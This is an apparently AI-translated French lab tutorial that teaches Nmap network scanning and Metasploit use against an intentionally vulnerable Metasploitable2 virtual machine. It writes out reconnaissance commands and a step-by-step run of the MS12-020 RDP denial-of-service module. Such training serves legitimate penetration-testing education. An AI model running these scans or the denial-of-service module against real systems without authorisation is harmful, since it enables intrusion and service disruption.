Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités

NmapNmapBeginner
Pratiquer maintenant

💡 Ce tutoriel est traduit par l'IA à partir de la version anglaise. Pour voir la version originale, vous pouvez cliquer ici

Introduction

Dans ce laboratoire, vous apprendrez à utiliser Nmap et Metasploit pour le balayage réseau et l'analyse des vulnérabilités. Nmap (Network Mapper) est un outil open-source puissant pour la découverte de réseau et l'audit de sécurité, tandis que Metasploit est un cadre de test d'intrusion largement utilisé qui inclut une variété d'outils d'exploitation et de charges utiles.

L'objectif de ce laboratoire est de vous offrir une expérience pratique dans l'utilisation de Nmap pour effectuer différents types de balayages, d'analyser les résultats et d'utiliser Metasploit pour explorer plus en profondeur les vulnérabilités potentielles sur un système cible.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) nmap/NmapGroup -.-> nmap/installation("Installation and Setup") nmap/NmapGroup -.-> nmap/save_output("Save Output to File") nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/os_version_detection("OS and Version Detection") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") wireshark/WiresharkGroup -.-> wireshark/interface("Interface Overview") wireshark/WiresharkGroup -.-> wireshark/packet_capture("Packet Capture") subgraph Lab Skills nmap/installation -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} nmap/save_output -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} nmap/port_scanning -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} nmap/host_discovery -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} nmap/target_specification -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} nmap/os_version_detection -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} nmap/service_detection -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} wireshark/interface -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} wireshark/packet_capture -.-> lab-416120{{"Utiliser Nmap et Metasploit pour l'analyse de réseau et la détection de vulnérabilités"}} end

Configuration de l'environnement

Dans cette étape, vous allez configurer l'environnement de laboratoire en lançant le conteneur Kali Linux et la machine virtuelle Metasploitable2.

sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

Testez si la machine virtuelle est démarrée et fonctionnelle en l'envoyant un ping :

ping 192.168.122.102

Ensuite, démarrez le conteneur Kali Linux et entrez dans son environnement bash :

docker run -ti --network host b5b709a49cd5 bash

Testez la connexion réseau virtuelle dans le conteneur Kali, utilisez Ctrl-C pour quitter le ping :

ping 192.168.122.102

Utilisation de base de Nmap

Dans cette étape, vous apprendrez à utiliser Nmap pour des tâches de balayage de base, telles que la découverte d'hôtes, le balayage de ports, la détection de versions et la détection du système d'exploitation.

Effectuez un balayage complet en exécutant la commande suivante :

nmap -T4 -A 192.168.122.102

Effectuez un balayage de découverte d'hôtes en exécutant la commande suivante :

nmap -T4 -sn 192.168.122.102

Effectuez un balayage de ports en exécutant la commande suivante :

nmap -T4 192.168.122.102

Effectuez la détection du système d'exploitation en exécutant la commande suivante :

nmap -T4 -O 192.168.122.102

L'option -T4 définit le modèle de chronométrage pour un balayage agressif, tandis que l'option -A active la détection du système d'exploitation, le balayage de versions, le balayage de scripts et le traceroute. L'option -sn effectue un simple balayage de découverte d'hôtes, et l'option -O tente de détecter le système d'exploitation distant.

Utilisation avancée de Nmap

Dans cette étape, vous allez explorer des techniques de balayage Nmap plus avancées, telles que le balayage de sous-réseaux entiers, de plages de ports spécifiques et la spécification d'une interface réseau.

Effectuez un balayage d'un sous-réseau entier en exécutant la commande suivante :

nmap 127.0.0.1/24

Effectuez un balayage de ports spécifiques en exécutant la commande suivante :

nmap -p80,22,66 127.0.0.1

Liste les interfaces réseau locales en exécutant la commande suivante :

nmap --iflist

Spécifiez une interface réseau en exécutant la commande suivante :

nmap -e eth0 127.0.0.1

Ces techniques avancées vous permettent d'affiner vos balayages et de collecter des informations plus détaillées sur le réseau cible ou les hôtes.

Importation des résultats de balayage Nmap dans Metasploit

Dans cette étape, vous apprendrez à importer les résultats de balayage Nmap dans Metasploit pour une analyse et une exploitation plus approfondies.

  1. Effectuez un balayage complet et enregistrez la sortie dans un fichier XML en exécutant la commande suivante, et assurez-vous de placer le fichier XML dans le répertoire personnel ~/. Cette étape peut prendre un certain temps :
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
  1. Démarrez la console Metasploit :
cd ~
service postgresql start
msfdb init
msfconsole
  1. Importez le fichier XML dans Metasploit en exécutant la commande suivante dans la console Metasploit :
db_import shiyanlou.xml
  1. Affichez les services importés en exécutant la commande suivante dans la console Metasploit :
services
  1. Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

En important les résultats de balayage Nmap dans Metasploit, vous pouvez utiliser les outils et les modules puissants disponibles dans le cadre Metasploit pour analyser et potentiellement exploiter les vulnérabilités sur le système cible.

Utilisation des modules dans Metasploit

Dans cette étape, vous apprendrez à rechercher et à utiliser des modules dans le cadre Metasploit.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Maintenant, vous pouvez rechercher des modules en utilisant la commande search dans la console Metasploit :
search ms12-020
  1. Pour utiliser un module dans la console Metasploit :
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1. Affichez les options disponibles pour le module dans la console Metasploit :
show options
  1. Définissez les options requises dans la console Metasploit :
set RHOST 192.168.122.102
  1. Exécutez le module dans la console Metasploit :
exploit
  1. Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Metasploit propose une large gamme de modules à diverses fins, telles que les exploits, les payloads, les modules auxiliaires, etc. En recherchant et en utilisant le module approprié, vous pouvez tenter d'exploiter des vulnérabilités ou effectuer d'autres actions sur le système cible.

Résumé

Dans ce laboratoire, vous avez appris à utiliser Nmap pour le balayage réseau et la collecte d'informations, ainsi qu'à importer les résultats de balayage dans Metasploit pour une analyse et une exploitation plus approfondies. Vous avez acquis une expérience pratique avec diverses techniques de balayage Nmap, notamment la découverte d'hôtes, le balayage de ports, la détection de versions et la détection du système d'exploitation. De plus, vous avez appris à rechercher et à utiliser des modules dans le cadre Metasploit pour potentiellement exploiter les vulnérabilités sur le système cible.

Tout au long du laboratoire, vous avez pratiqué des compétences essentielles pour les tests de pénétration, telles que la configuration d'un environnement contrôlé, la réalisation de reconnaissances et l'analyse des vulnérabilités potentielles. Ces compétences sont cruciales dans le domaine de la cybersécurité et vous aideront à développer une compréhension plus approfondie des concepts de sécurité des réseaux et des techniques de piratage éthique.